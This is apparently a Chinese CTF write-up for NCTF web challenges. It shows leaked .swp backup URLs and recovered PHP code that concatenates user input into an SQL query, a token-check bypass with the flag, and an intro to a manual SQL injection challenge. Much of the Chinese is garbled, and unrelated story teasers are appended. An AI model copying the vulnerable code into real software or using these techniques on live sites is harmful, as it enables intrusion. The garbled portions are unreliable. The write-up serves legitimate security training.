1.http://nctf.nuptzj.cn/web14/.index.php.swp----Not Found
2.http://nctf.nuptzj.cn/web14/.submit.php.swp---Success


........榪欎竴琛屾槸鐪佺暐鐨勪唬鐮?........

/*
濡傛灉鐧誨綍閭鍦板潃涓嶆槸綆＄悊鍛樺垯 die()
鏁版嵁搴撶粨鏋?

--
-- 琛ㄧ殑緇撴瀯 `user`
--

CREATE TABLE IF NOT EXISTS `user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  `token` int(255) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;

--
-- 杞瓨琛ㄤ腑鐨勬暟鎹? `user`
--

INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES
(1, '****涓嶅彲瑙?***', '***涓嶅彲瑙?***', 0);
*/


........榪欎竴琛屾槸鐪佺暐鐨勪唬鐮?........

if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');
    $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
    $r = mysql_query($sql) or die('db error');
    $r = mysql_fetch_assoc($r);
    $r = $r['num'];
    if($r>0){
        echo $flag;
    }else{
        echo "澶辮觸浜嗗憖";
    }
}

關(guān)鍵代碼：

if(strlen($token)!=10) die('fail');
    if($token!='0') die('fail');

令token=0000000000,就出來了胖眷，考的就是找個(gè).swp文件。
flag:nctf{thanks_to_cumt_bxs}
nctf{thanks_to_cumt_bxs}

注入實(shí)戰(zhàn)1

請(qǐng)使用firefox瀏覽器霹崎，并安裝hackbar插件（自行百度并熟悉）
目標(biāo)網(wǎng)址：地址
flag為管理員密碼的32位md5(小寫)
并且加上nctf{}

手注教程群里面發(fā)過珊搀。
看不懂的話自行百度"mysql手動(dòng)注入"查閱相關(guān)文章

PS:用sqlmap等工具做的就不要厚臉皮提交了

好像完蛋了,參考文章

最后編輯于：2018.02.10 15:13:58

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末，一起剝皮案震驚了整個(gè)濱河市尾菇，隨后出現(xiàn)的幾起案子境析，更是在濱河造成了極大的恐慌，老刑警劉巖派诬，帶你破解...
沈念sama閱讀 216,496評(píng)論 6贊 501
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件劳淆，死亡現(xiàn)場離奇詭異，居然都是意外死亡默赂，警方通過查閱死者的電腦和手機(jī)沛鸵，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 92,407評(píng)論 3贊 392
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門，熙熙樓的掌柜王于貴愁眉苦臉地迎上來，“玉大人曲掰，你說我怎么就攤上這事疾捍。” “怎么了栏妖？”我有些...
開封第一講書人閱讀 162,632評(píng)論 0贊 353
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵乱豆，是天一觀的道長。經(jīng)常有香客問我吊趾，道長宛裕，這世上最難降的妖魔是什么？我笑而不...
開封第一講書人閱讀 58,180評(píng)論 1贊 292
?港島之戀（遺憾婚禮）
正文為了忘掉前任论泛，我火速辦了婚禮揩尸，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘孵奶。我一直安慰自己疲酌，他們只是感情好，可當(dāng)我...
茶點(diǎn)故事閱讀 67,198評(píng)論 6贊 388
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布了袁。她就那樣靜靜地躺著朗恳，像睡著了一般。火紅的嫁衣襯著肌膚如雪载绿。梳的紋絲不亂的頭發(fā)上粥诫，一...
開封第一講書人閱讀 51,165評(píng)論 1贊 299
城市分裂傳說
那天，我揣著相機(jī)與錄音崭庸，去河邊找鬼怀浆。笑死，一個(gè)胖子當(dāng)著我的面吹牛怕享，可吹牛的內(nèi)容都是我干的执赡。我是一名探鬼主播，決...
沈念sama閱讀 40,052評(píng)論 3贊 418
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼函筋，長吁一口氣：“原來是場噩夢啊……” “哼沙合！你這毒婦竟也來了？” 一聲冷哼從身側(cè)響起跌帐，我...
開封第一講書人閱讀 38,910評(píng)論 0贊 274
萬榮殺人案實(shí)錄
序言：老撾萬榮一對(duì)情侶失蹤首懈，失蹤者是張志新（化名）和其女友劉穎，沒想到半個(gè)月后谨敛，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體究履，經(jīng)...
沈念sama閱讀 45,324評(píng)論 1贊 310
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 37,542評(píng)論 2贊 332
?白月光啟示錄
正文我和宋清朗相戀三年脸狸，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了最仑。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
茶點(diǎn)故事閱讀 39,711評(píng)論 1贊 348
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡，死狀恐怖盯仪，靈堂內(nèi)的尸體忽然破棺而出紊搪，到底是詐尸還是另有隱情，我是刑警寧澤全景，帶...
沈念sama閱讀 35,424評(píng)論 5贊 343
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布，位于F島的核電站牵囤，受9級(jí)特大地震影響爸黄，放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜揭鳞，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 41,017評(píng)論 3贊 326
男人毒藥：我在死后第九天來索命
文/蒙蒙一炕贵、第九天我趴在偏房一處隱蔽的房頂上張望。院中可真熱鬧野崇，春花似錦称开、人聲如沸。這莊子的主人今日做“春日...
開封第一講書人閱讀 31,668評(píng)論 0贊 22
一樁弒父案鳖轰，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽。三九已至扶镀，卻和暖如春蕴侣，著一層夾襖步出監(jiān)牢的瞬間，已是汗流浹背臭觉。一陣腳步聲響...
開封第一講書人閱讀 32,823評(píng)論 1贊 269
情欲美人皮
我被黑心中介騙來泰國打工昆雀，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留，地道東北人蝠筑。一個(gè)月前我還...
沈念sama閱讀 47,722評(píng)論 2贊 368
代替公主和親
正文我出身青樓狞膘，卻偏偏與公主長得像，于是被迫代替她去往敵國和親什乙。傳聞我的和親對(duì)象是個(gè)殘疾皇子挽封，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 44,611評(píng)論 2贊 353

[南郵OJ]Web

簽到2

這題不是WEB

層層遞進(jìn)

單身二十年

綜合題

pass check

Header

文件包含

單身一百年也沒用

Download~!

COOKIE

MYSQL

md5 collision

bypass again

PHP是世界上最好的語言

SQL注入1

/x00

變量覆蓋

上傳繞過

起名字真難

sql injection 3

密碼重置

sql injection 4

你從哪里來

AAencode

php 反序列化

SQL注入2

綜合題2

1. SQL注入

2. 開始登陸, Getshell

密碼重置2

注入實(shí)戰(zhàn)1

推薦閱讀更多精彩內(nèi)容